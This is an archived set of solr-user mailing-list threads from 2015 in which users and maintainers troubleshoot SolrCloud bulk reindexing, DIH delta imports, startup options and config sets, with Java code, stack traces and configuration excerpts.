No problem Walter, it's all fun. Was just wondering if there was some other
good way that I did not know of, that's all 

Thanks

Ravi Kiran Bhaskar

On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org>
wrote:

> Sorry, I did not mean to be rude. The original question did not say that
> you don’t have the docs outside of Solr. Some people jump to the advanced
> features and miss the simple ones.
>
> It might be faster to fetch all the docs from Solr and save them in files.
> Then modify them. Then reload all of them. No guarantee, but it is worth a
> try.
>
> Good luck.
>
> wunder
> Walter Underwood
> wun...@wunderwood.org <javascript:;>
> http://observer.wunderwood.org/  (my blog)
>
>
> > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
> >
> > Walter, Not in a mood for banter right now Its 6:00pm on a friday and
> > Iam stuck here trying to figure reindexing issues :-)
> > I dont have source of docs so I have to query the SOLR, modify and put it
> > back and that is seeming to be quite a task in 5.3.0, I did reindex
> several
> > times with 4.7.2 in a master slave env without any issue. Since then we
> > have moved to cloud and it has been a pain all day.
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
> > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org
> <javascript:;>>
> > wrote:
> >
> >> Sure.
> >>
> >> 1. Delete all the docs (no commit).
> >> 2. Add all the docs (no commit).
> >> 3. Commit.
> >>
> >> wunder
> >> Walter Underwood
> >> wun...@wunderwood.org <javascript:;>
> >> http://observer.wunderwood.org/  (my blog)
> >>
> >>
> >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
> >>>
> >>> I have been trying to re-index the docs (about 1.5 million) as one of
> the
> >>> field needed part of string value removed (accidentally introduced). I
> >> was
> >>> issuing a query for 100 docs getting 4 fields and updating the doc
> >> (atomic
> >>> update with "set") via the CloudSolrClient in batches, However from
> time
> >> to
> >>> time the query returns 0 results, which exits the re-indexing program.
> >>>
> >>> I cant understand as to why the cloud returns 0 results when there are
> >> 1.4x
> >>> million docs which have the "accidental" string in them.
> >>>
> >>> Is there another way to do bulk massive updates ?
> >>>
> >>> Thanks
> >>>
> >>> Ravi Kiran Bhaskar
> >>
> >>
>
>


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Walter, Not in a mood for banter right now Its 6:00pm on a friday and
Iam stuck here trying to figure reindexing issues :-)
I dont have source of docs so I have to query the SOLR, modify and put it
back and that is seeming to be quite a task in 5.3.0, I did reindex several
times with 4.7.2 in a master slave env without any issue. Since then we
have moved to cloud and it has been a pain all day.

Thanks

Ravi Kiran Bhaskar

On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org>
wrote:

> Sure.
>
> 1. Delete all the docs (no commit).
> 2. Add all the docs (no commit).
> 3. Commit.
>
> wunder
> Walter Underwood
> wun...@wunderwood.org
> http://observer.wunderwood.org/  (my blog)
>
>
> > On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com> wrote:
> >
> > I have been trying to re-index the docs (about 1.5 million) as one of the
> > field needed part of string value removed (accidentally introduced). I
> was
> > issuing a query for 100 docs getting 4 fields and updating the doc
> (atomic
> > update with "set") via the CloudSolrClient in batches, However from time
> to
> > time the query returns 0 results, which exits the re-indexing program.
> >
> > I cant understand as to why the cloud returns 0 results when there are
> 1.4x
> > million docs which have the "accidental" string in them.
> >
> > Is there another way to do bulk massive updates ?
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
>
>


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Thanks for responding Erick. I set the "start" to zero and "rows" always to
100. I create CloudSolrClient instance and use it to both query as well as
index. But I do sleep for 5 secs just to allow for any auto commits.

So query --> client.add(100 docs) --> wait --> query again

But the weird thing I noticed was that after 8 or 9 batches I.e 800/900
docs the "query again" returns zero docs causing my while loop to
exist...so was trying to see if I was doing the right thing or if there is
an alternate way to do heavy indexing.

Thanks

Ravi Kiran Bhaskar



On Friday, September 25, 2015, Erick Erickson <erickerick...@gmail.com>
wrote:

> How are you querying Solr? You say you query for 100 docs,
> update then get the next set. What are you using for a marker?
> If you're using the start parameter, and somehow a commit is
> creeping in things might be weird, especially if you're using any
> of the internal Lucene doc IDs. If you're absolutely sure no commits
> are taking place even that should be OK.
>
> The "deep paging" stuff could be helpful here, see:
>
> https://lucidworks.com/blog/coming-soon-to-solr-efficient-cursor-based-iteration-of-large-result-sets/
>
> Best,
> Erick
>
> On Fri, Sep 25, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
> > No problem Walter, it's all fun. Was just wondering if there was some
> other
> > good way that I did not know of, that's all 
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
> > On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org
> <javascript:;>>
> > wrote:
> >
> >> Sorry, I did not mean to be rude. The original question did not say that
> >> you don’t have the docs outside of Solr. Some people jump to the
> advanced
> >> features and miss the simple ones.
> >>
> >> It might be faster to fetch all the docs from Solr and save them in
> files.
> >> Then modify them. Then reload all of them. No guarantee, but it is
> worth a
> >> try.
> >>
> >> Good luck.
> >>
> >> wunder
> >> Walter Underwood
> >> wun...@wunderwood.org <javascript:;> <javascript:;>
> >> http://observer.wunderwood.org/  (my blog)
> >>
> >>
> >> > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>
> >> <javascript:;>> wrote:
> >> >
> >> > Walter, Not in a mood for banter right now Its 6:00pm on a friday
> and
> >> > Iam stuck here trying to figure reindexing issues :-)
> >> > I dont have source of docs so I have to query the SOLR, modify and
> put it
> >> > back and that is seeming to be quite a task in 5.3.0, I did reindex
> >> several
> >> > times with 4.7.2 in a master slave env without any issue. Since then
> we
> >> > have moved to cloud and it has been a pain all day.
> >> >
> >> > Thanks
> >> >
> >> > Ravi Kiran Bhaskar
> >> >
> >> > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <
> wun...@wunderwood.org <javascript:;>
> >> <javascript:;>>
> >> > wrote:
> >> >
> >> >> Sure.
> >> >>
> >> >> 1. Delete all the docs (no commit).
> >> >> 2. Add all the docs (no commit).
> >> >> 3. Commit.
> >> >>
> >> >> wunder
> >> >> Walter Underwood
> >> >> wun...@wunderwood.org <javascript:;> <javascript:;>
> >> >> http://observer.wunderwood.org/  (my blog)
> >> >>
> >> >>
> >> >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>
> >> <javascript:;>> wrote:
> >> >>>
> >> >>> I have been trying to re-index the docs (about 1.5 million) as one
> of
> >> the
> >> >>> field needed part of string value removed (accidentally
> introduced). I
> >> >> was
> >> >>> issuing a query for 100 docs getting 4 fields and updating the doc
> >> >> (atomic
> >> >>> update with "set") via the CloudSolrClient in batches, However from
> >> time
> >> >> to
> >> >>> time the query returns 0 results, which exits the re-indexing
> program.
> >> >>>
> >> >>> I cant understand as to why the cloud returns 0 results when there
> are
> >> >> 1.4x
> >> >>> million docs which have the "accidental" string in them.
> >> >>>
> >> >>> Is there another way to do bulk massive updates ?
> >> >>>
> >> >>> Thanks
> >> >>>
> >> >>> Ravi Kiran Bhaskar
> >> >>
> >> >>
> >>
> >>
>


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
thank you for taking time to help me out. Yes I was not using cursorMark, I
will try that next. This is what I was doing, its a bit shabby coding but
what can I say my brain was fried :-) FYI this is a side process just to
correct a messed up string. The actual indexing process was working all the
time as our business owners are a bit petulant about stopping indexing. My
autocommit conf and code is given below, as you can see autocommit should
fire every 100 docs anyway


   100
   12



3

  

private static void processDocs() {

try {
CloudSolrClient client = new
CloudSolrClient("zk1:,zk2:,zk3.com:");
client.setDefaultCollection("collection1");

//First initialize docs
SolrDocumentList docList = getDocs(client, 100);
Long count = 0L;

while (docList != null && docList.size() > 0) {

List inList = new
ArrayList();
for(SolrDocument doc : docList) {

SolrInputDocument iDoc =
ClientUtils.toSolrInputDocument(doc);

//This is my SOLR's Unique id
String uniqueId = (String)
iDoc.getFieldValue("uniqueId");

/*
 * This is another system's id which is what I want to
correct. Was messed
 * because of script transformer in DIH import via
SolrEntityProcessor
 * ex-
sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f
 */
String uuid = (String) iDoc.getFieldValue("uuid");
String sanitizedUUID =
uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
Map<String,String> fieldModifier = new
HashMap<String,String>(1);
fieldModifier.put("set",sanitizedUUID);
iDoc.setField("uuid", fieldModifier);

inList.add(iDoc);
log.info("added " + systemid);
}

client.add(inList);

count = count + docList.size();
log.info("Indexed " + count + "/" + docList.getNumFound());

Thread.sleep(5000);

docList = getDocs(client, docList.size());
log.info("Got Docs- " + docList.getNumFound());
}

} catch (Exception e) {
log.error("Error indexing ", e);
}
}

private static SolrDocumentList getDocs(CloudSolrClient client, Integer
rows) {


SolrQuery q = new SolrQuery("*:*");
q.setSort("publishtime", ORDER.desc);
q.setStart(0);
q.setRows(rows);
q.addFilterQuery(new String[] {"uuid:[* TO *]",
"uuid:sun.org.mozilla*"});
q.setFields(new String[]{"uniqueId","uuid"});
SolrDocumentList docList = null;
QueryResponse resp;
try {
resp = client.query(q);
docList = resp.getResults();
} catch (Exception e) {
log.error("Error querying " + q.toString(), e);
}
return docList;
}


Thanks

Ravi Kiran Bhaskar

On Fri, Sep 25, 2015 at 10:58 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Wait, query again how? You've got to have something that keeps you
> from getting the same 100 docs back so you have to be sorting somehow.
> Or you have a high water mark. Or something. Waiting 5 seconds for any
> commit also doesn't really make sense to me. I mean how do you know
>
> 1> that you're going to get a commit (did you explicitly send one from
> the client?).
> 2> all autowarming will be complete by the time the next query hits?
>
> Let's see the query you fire. There has to be some kind of marker that
> you're using to know when you've gotten through the entire set.
>
> And I would use much larger batches, I usually update in batches of
> 1,000 (excepting if these are very large docs of course). I suspect
> you're spending a lot more time sleeping than you need to. I wouldn't
> sleep at all in fact. This is one (rare) case I might consider
> committing from the client. If you specify the wait for searcher param
> (server.commit(true, true), then it doesn't return until a new
> searcher is completely opened so your previous updates will be
> reflected in your next search.
>
> Actually, what I'd really do is
> 1> turn off all auto commits
> 2> go ahead and query/change/update. But the query bits would be using
> the cursormark.
> 3> do NOT commit
> 4> issue a commit when you were all done.
>
> I bet you'd get through your update a lot fa

Weird Exception

2015-09-23 Thread Ravi Solr
  (qtp1256054824-13) [c:collection1
s:shard1 r:core_node2 x:collection1_shard1_replica4] o.a.s.c.S.Request
[collection1_shard1_replica4] webapp=/solr path=/select
params={sort=_docid_+asc=*:*=false=javabin=2=0}
status=500 QTime=1
2015-09-24 01:43:33.668 ERROR (qtp1256054824-13) [c:collection1
s:shard1 r:core_node2 x:collection1_shard1_replica4]
o.a.s.s.SolrDispatchFilter null:java.lang.IllegalStateException: Type
mismatch: pubdatetime was indexed with multiple values per document,
use SORTED_SET instead
at 
org.apache.lucene.uninverting.FieldCacheImpl$SortedDocValuesCache.createValue(FieldCacheImpl.java:679)
at 
org.apache.lucene.uninverting.FieldCacheImpl$Cache.get(FieldCacheImpl.java:190)
at 
org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:647)
at 
org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:627)
at 
org.apache.lucene.uninverting.UninvertingReader.getSortedDocValues(UninvertingReader.java:257)
at 
org.apache.lucene.index.MultiDocValues.getSortedValues(MultiDocValues.java:316)
at 
org.apache.lucene.index.SlowCompositeReaderWrapper.getSortedDocValues(SlowCompositeReaderWrapper.java:125)
at org.apache.lucene.index.DocValues.getSortedSet(DocValues.java:304)
at 
org.apache.solr.search.function.OrdFieldSource.getValues(OrdFieldSource.java:99)
at 
org.apache.lucene.queries.function.FunctionQuery$AllScorer.(FunctionQuery.java:116)
at 
org.apache.lucene.queries.function.FunctionQuery$FunctionWeight.scorer(FunctionQuery.java:93)
at org.apache.lucene.search.BooleanWeight.scorer(BooleanWeight.java:274)
at org.apache.lucene.search.Weight.bulkScorer(Weight.java:135)
at 
org.apache.lucene.search.BooleanWeight.bulkScorer(BooleanWeight.java:256)
at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:769)
at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:486)
at 
org.apache.solr.search.SolrIndexSearcher.buildAndRunCollectorChain(SolrIndexSearcher.java:200)
at 
org.apache.solr.search.SolrIndexSearcher.getDocListNC(SolrIndexSearcher.java:1682)
at 
org.apache.solr.search.SolrIndexSearcher.getDocListC(SolrIndexSearcher.java:1501)
at 
org.apache.solr.search.SolrIndexSearcher.search(SolrIndexSearcher.java:555)
at 
org.apache.solr.handler.component.QueryComponent.process(QueryComponent.java:522)
at 
org.apache.solr.handler.component.SearchHandler.handleRequestBody(SearchHandler.java:277)
at 
org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:143)
at org.apache.solr.core.SolrCore.execute(SolrCore.java:2068)
at org.apache.solr.servlet.HttpSolrCall.execute(HttpSolrCall.java:669)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:462)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:210)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:179)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1652)
at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:585)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
at 
org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:577)
at 
org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:223)
at 
org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1127)
at 
org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:515)
at 
org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185)
at 
org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1061)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141)
at 
org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:215)
at 
org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:110)
at 
org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
at org.eclipse.jetty.server.Server.handle(Server.java:499)
at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:310)
at 
org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257)
at 
org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:540)
at 
org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635)
at 
org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555)
at java.lang.Thread.run(Thread.java:745)


Re: SolrCloud Startup question

2015-09-22 Thread Ravi Solr
Thanks Anshum

On Mon, Sep 21, 2015 at 6:23 PM, Anshum Gupta <ans...@anshumgupta.net>
wrote:

> CloudSolrClient is thread safe and it is highly recommended you reuse the
> client.
>
> If you are providing an HttpClient instance while constructing, make sure
> that the HttpClient uses a multi-threaded connection manager.
>
> On Mon, Sep 21, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com> wrote:
>
> > Thank you Anshum & Upayavira.
> >
> > BTW do any of you guys know if CloudSolrClient is ThreadSafe ??
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> > On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net>
> > wrote:
> >
> > > Hi Ravi,
> > >
> > > I just tried it out and here's my understanding:
> > >
> > > 1. Starting Solr with -c starts Solr in cloud mode. This is used to
> start
> > > Solr with an embedded zookeeper.
> > > 2. Starting Solr with -z starts Solr in cloud mode, with the zk
> > connection
> > > string you specify. You don't need to explicitly specify -c in this
> case.
> > > The help text there needs a bit of fixing though
> > >
> > > *  -zZooKeeper connection string; only used when running in
> > > SolrCloud mode using -c*
> > > *   To launch an embedded ZooKeeper instance, don't
> pass
> > > this parameter.*
> > >
> > > *"only used when running in SolrCloud mode using -c" *needs to be
> > rephrased
> > > or removed. Can you create a JIRA for the same?
> > >
> > >
> > > On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com
> > > <javascript:;>> wrote:
> > >
> > > > Can somebody kindly help me understand the difference between the
> > > following
> > > > startup calls ?
> > > >
> > > > ./solr start -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> > > >
> > > > Vs
> > > >
> > > > ./solr start -c -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> > > >
> > > > What happens if i don't pass the "-c" option ?? I read the
> > documentation
> > > > but got more confused, I do run a ZK ensemble of 3 instances.  FYI my
> > > cloud
> > > > seems to work fine and teh Admin UI shows Cloud graph just fine, but
> I
> > > want
> > > > to just make sure I am doing the right thing and not missing any
> > nuance.
> > > >
> > > > The following is form documention on cwiki.
> > > > ---
> > > >
> > > > "Start Solr in SolrCloud mode, which will also launch the embedded
> > > > ZooKeeper instance included with Solr.
> > > >
> > > > This option can be shortened to simply -c.
> > > >
> > > > If you are already running a ZooKeeper ensemble that you want to use
> > > > instead of the embedded (single-node) ZooKeeper, you should also pass
> > the
> > > > -z parameter."
> > > >
> > > > -
> > > >
> > > > Thanks
> > > >
> > > > Ravi Kiran Bhaskar
> > > >
> > >
> > >
> > >
> > > --
> > > Anshum Gupta
> > >
> >
>
>
>
> --
> Anshum Gupta
>


Re: SolrCloud Startup question

2015-09-21 Thread Ravi Solr
Thank you Anshum & Upayavira.

BTW do any of you guys know if CloudSolrClient is ThreadSafe ??

Thanks,

Ravi Kiran Bhaskar

On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net> wrote:

> Hi Ravi,
>
> I just tried it out and here's my understanding:
>
> 1. Starting Solr with -c starts Solr in cloud mode. This is used to start
> Solr with an embedded zookeeper.
> 2. Starting Solr with -z starts Solr in cloud mode, with the zk connection
> string you specify. You don't need to explicitly specify -c in this case.
> The help text there needs a bit of fixing though
>
> *  -zZooKeeper connection string; only used when running in
> SolrCloud mode using -c*
> *   To launch an embedded ZooKeeper instance, don't pass
> this parameter.*
>
> *"only used when running in SolrCloud mode using -c" *needs to be rephrased
> or removed. Can you create a JIRA for the same?
>
>
> On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
>
> > Can somebody kindly help me understand the difference between the
> following
> > startup calls ?
> >
> > ./solr start -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> >
> > Vs
> >
> > ./solr start -c -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> >
> > What happens if i don't pass the "-c" option ?? I read the documentation
> > but got more confused, I do run a ZK ensemble of 3 instances.  FYI my
> cloud
> > seems to work fine and teh Admin UI shows Cloud graph just fine, but I
> want
> > to just make sure I am doing the right thing and not missing any nuance.
> >
> > The following is form documention on cwiki.
> > ---
> >
> > "Start Solr in SolrCloud mode, which will also launch the embedded
> > ZooKeeper instance included with Solr.
> >
> > This option can be shortened to simply -c.
> >
> > If you are already running a ZooKeeper ensemble that you want to use
> > instead of the embedded (single-node) ZooKeeper, you should also pass the
> > -z parameter."
> >
> > -
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
>
>
>
> --
> Anshum Gupta
>


SolrCloud Startup question

2015-09-21 Thread Ravi Solr
Can somebody kindly help me understand the difference between the following
startup calls ?

./solr start -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181

Vs

./solr start -c -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181

What happens if i don't pass the "-c" option ?? I read the documentation
but got more confused, I do run a ZK ensemble of 3 instances.  FYI my cloud
seems to work fine and teh Admin UI shows Cloud graph just fine, but I want
to just make sure I am doing the right thing and not missing any nuance.

The following is form documention on cwiki.
---

"Start Solr in SolrCloud mode, which will also launch the embedded
ZooKeeper instance included with Solr.

This option can be shortened to simply -c.

If you are already running a ZooKeeper ensemble that you want to use
instead of the embedded (single-node) ZooKeeper, you should also pass the
-z parameter."

-

Thanks

Ravi Kiran Bhaskar


Re: SolrCloud DIH issue

2015-09-20 Thread Ravi Solr
Yes Upayavira, that's exactly what prompted me to ask Erick as soon as I
read https://cwiki.apache.org/confluence/display/solr/Config+Sets

Erick, Regarding my delta-import not working I do see the
dataimport.properties in zookeeper. after I "upconfig" and "linkconfig" my
conf files into ZK...see below

[zk: localhost: (CONNECTED) 0] ls /configs/xx
[admin-extra.menu-top.html, person-synonyms.txt, entity-stopwords.txt,
protwords.txt, location-synonyms.txt, solrconfig.xml,
organization-synonyms.txt, stopwords.txt, spellings.txt,
dataimport.properties, admin-extra.html, xslt, synonyms.txt, scripts.conf,
subject-synonyms.txt, elevate.xml, admin-extra.menu-bottom.html,
solr-import-config.xml, clustering, schema.xml]

However, when I look into dataimport.properties in my 'conf' folder it
hasn't updated even after running full-import on Sep 19 2015 1:00AM
successfully and subsequent delta-import on Sep 20 2015 11:AM which did not
import newer docs, This prompted me to look into the dataimport.properties
in the conf folder...the details are shown below, you can clearly see the
dates are quite a bit off.

[@y conf]$ cat dataimport.properties
#Tue Sep 15 18:11:17 UTC 2015
reindex-docs.last_index_time=2015-09-15 18\:11\:16
last_index_time=2015-09-15 18\:11\:16
sep.last_index_time=2014-03-24 13\:41\:46


I saw some JIRA tickets about different location of dataimport.properties
for SolrCloud but couldnt find the path where it stores...Anybody have idea
where it stores it ?

Thanks

Ravi Kiran Bhaskar



On Sun, Sep 20, 2015 at 5:28 AM, Upayavira <u...@odoko.co.uk> wrote:

> It is worth noting that the ref guide page on configsets refers to
> non-cloud mode (a useful new feature) whereas people may confuse this
> with configsets in cloud mode,  which use Zookeeper.
>
> Upayavira
>
> On Sun, Sep 20, 2015, at 04:59 AM, Ravi Solr wrote:
> > Cant thank you enough for clarifying it at length. Yeah its pretty
> > confusing even for experienced Solr users. I used the upconfig and
> > linkconfig commands to update 4 collections into zookeeper...As you
> > described, I lucked out as I used the same name for configset and the
> > collection and hence did not have to use the collections API :-)
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> > On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson
> > <erickerick...@gmail.com>
> > wrote:
> >
> > > Let's back up a second. Configsets are what _used_ to be in the conf
> > > directory for each core on a local drive, it's just that they're now
> > > kept up on Zookeeper. Otherwise, you'd have to put them on each
> > > instance in SolrCloud, and bringing up a new replica on a new machine
> > > would look a lot like adding a core with the old core admin API.
> > >
> > > So instead, configurations are kept on zookeeper. A config set
> > > consists of, essentially, a named old-style "conf" directory. There's
> > > no a-priori limit to the number of config sets you can have. Look in
> > > the admin UI, Cloud>>tree>>configs and you'll see each name you've
> > > pushed to ZK. If you explore that tree, you'll see a lot of old
> > > familiar faces, schema.xml, solrconfig.xml, etc.
> > >
> > > So now we come to associating configs with collections. You've
> > > probably done one of the examples where some things happen under the
> > > covers, including explicitly pushing the configset to Zookeeper.
> > > Currently, there's no option in the bin/solr script to push a config,
> > > although I know there's a JIRA to do that.
> > >
> > > So, to put a new config set up you currently need to use the zkCli.sh
> > > script see:
> > >
> https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities,
> > > the "upconfig" command. That pushes the configset up to ZK and gives
> > > it a name.
> > >
> > > Now, you create a collection and it needs a configset stored in ZK.
> > > It's a little tricky in that if you do _not_ explicitly specify a
> > > configest (using the collection.configName parameter to the
> > > collections API CREATE command), then by default it'll look for a
> > > configset with the same name as the collection. If it doesn't find
> > > one, _and_ there is one and only one configset, then it'll use that
> > > one (personally I find that confusing, but that's the way it works).
> > > See: https://cwiki.apache.org/confluence/display/solr/Collections+API
> > >
> > > If you have two or more configsets in ZK, then either the configset
> > > name has to be identical to the collection na

Re: SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
Thanks Erick, I will report back once the reindex is finished. Oh, your
answer reminded me of another question - Regarding configsets the
documentation says

"On a multicore Solr instance, you may find that you want to share
configuration between a number of different cores."

Can the same be used to push disparate mutually exclusive configs ? I ask
this as I have 4 mutually exclusive apps each with a 4 single core index on
a single machine which I am trying to convert to SolrCloud with single
shard approach. Just being lazy and trying to find a way to update and link
configs to zookeeper ;-)

Thanks

Rvai Kiran Bhaskar

On Sat, Sep 19, 2015 at 6:54 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Just pushing up the entire configset would be easiest, but the
> Zookeeper command line tools allow you to push up a single
> file if you want.
>
> Yeah, it puzzles me too that the import worked yesterday, not really
> sure what happened, the file shouldn't just disappear
>
> Erick
>
> On Sat, Sep 19, 2015 at 2:46 PM, Ravi Solr <ravis...@gmail.com> wrote:
> > Thank you for the prompt response Erick. I did a full-import yesterday,
> you
> > are correct that I did not push dataimport.properties to ZK, should it
> have
> > not worked even for a full import ?. You may be right about 'clean'
> option,
> > I will reindex again today. BTW how do we push a single file to a
> specific
> > config name in zookeeper ?
> >
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> >
> > On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com
> >
> > wrote:
> >
> >> Could not read DIH properties from
> >> /configs/sitesearchcore/dataimport.properties
> >>
> >> This looks like somehow you didn't push this file up to Zookeeper. You
> >> can check what files are there in the admin UI. How you indexed
> >> yesterday is a mystery though, unless somehow this file was removed
> >> from ZK.
> >>
> >> As for why you lost all the docs, my suspicion is that you have the
> >> clean param set up for delta import
> >>
> >> FWIW,
> >> Erick
> >>
> >> On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote:
> >> > I am facing a weird problem. As part of upgrade from 4.7.2
> (Master-Slave)
> >> > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using
> >> > SolrEntityProcessor yesterday, all of them indexed properly. Today
> >> morning
> >> > I just ran the DIH again with delta import and I lost all docs...what
> am
> >> I
> >> > missing ? Did anybody face similar issue ?
> >> >
> >> > Here are the errors in the logs
> >> >
> >> > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was
> >> not
> >> > closed!
> >> > req=waitSearcher=true=
> >>
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> >> > 9/19/2015,
> >> > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015,
> 2:41:17 AM
> >> > WARN null ZKPropertiesWriter Could not read DIH properties from
> >> > /configs/sitesearchcore/dataimport.properties :class
> >> > org.apache.zookeeper.KeeperException$NoNodeException
> >> >
> >> > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode
> >> > = NoNode for /configs/sitesearchcore/dataimport.properties
> >> > at
> >> org.apache.zookeeper.KeeperException.create(KeeperException.java:111)
> >> > at
> >> org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
> >> > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155)
> >> > at
> >> org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349)
> >> > at
> >>
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91)
> >> > at
> >>
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461)
> >> >
> >> > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo
> was
> >> not
> >> > closed!
> >> > req=waitSearcher=true=
> >>
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> >> > 9/19/2015,
> >> > 11:16:43 AM ERROR null SolrCore prev == info : false
> >> >
> >> >
> >> >
> >> > Thanks
> >> >
> >> > Ravi Kiran Bhaskar
> >>
>


Re: SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
Cant thank you enough for clarifying it at length. Yeah its pretty
confusing even for experienced Solr users. I used the upconfig and
linkconfig commands to update 4 collections into zookeeper...As you
described, I lucked out as I used the same name for configset and the
collection and hence did not have to use the collections API :-)

Thanks,

Ravi Kiran Bhaskar

On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Let's back up a second. Configsets are what _used_ to be in the conf
> directory for each core on a local drive, it's just that they're now
> kept up on Zookeeper. Otherwise, you'd have to put them on each
> instance in SolrCloud, and bringing up a new replica on a new machine
> would look a lot like adding a core with the old core admin API.
>
> So instead, configurations are kept on zookeeper. A config set
> consists of, essentially, a named old-style "conf" directory. There's
> no a-priori limit to the number of config sets you can have. Look in
> the admin UI, Cloud>>tree>>configs and you'll see each name you've
> pushed to ZK. If you explore that tree, you'll see a lot of old
> familiar faces, schema.xml, solrconfig.xml, etc.
>
> So now we come to associating configs with collections. You've
> probably done one of the examples where some things happen under the
> covers, including explicitly pushing the configset to Zookeeper.
> Currently, there's no option in the bin/solr script to push a config,
> although I know there's a JIRA to do that.
>
> So, to put a new config set up you currently need to use the zkCli.sh
> script see:
